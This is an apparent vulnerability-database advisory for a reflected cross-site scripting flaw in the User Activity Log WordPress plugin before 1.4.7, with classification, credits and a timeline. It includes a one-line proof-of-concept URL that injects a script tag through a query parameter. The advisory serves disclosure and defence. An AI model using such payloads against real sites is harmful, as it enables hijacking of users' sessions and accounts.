WordPress Plugin Vulnerabilities

User Activity Log < 1.4.7 - Reflected Cross Site Scripting via Query String

Description

The plugin does not escape the $_SERVER['QUERY_STRING'] before outputting it back in attributes, which could lead to Reflected Cross-Site Scripting in web browsers which do not encode URL characters.

Proof of Concept

With a web browser which does not encode characters (or use burp suite and decode the URL via the repeater)

https://example.com/wp-admin/admin.php?page=user_action_log&paged=1&userrole=Administrator"><script>alert(/XSS/)</script>&username=&type=&txtsearch=

Affects Plugins

Plugin icon
user-activity-log
Fixed in 1.4.7

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
swapnil subhash bodekar
Submitter
swapnil subhash bodekar
Verified
Yes
WPVDB ID
accf5522-cb5d-434b-98da-657e9ba8221e

Timeline

Publicly Published
2021-08-30 (about 2 years ago)
Added
2021-08-30 (about 2 years ago)
Last Updated
2021-08-30 (about 2 years ago)

Other

Published
Title
Published
2024-03-01
Title
Master Slider <= 3.9.9 - Editor+ Stored XSS via slider callback
Published
2023-09-18
Title
Bit Assist < 1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2014-08-01
Title
WP e-Commerce Predictive Search - "rs" Cross-Site Scripting
Published
2014-08-01
Title
Analytics360 1.2 - analytics360.php a360_error Parameter Reflected XSS
Published
2023-01-04
Title
RSS Aggregator by Feedzy < 4.1.1 - Contributor+ Stored XSS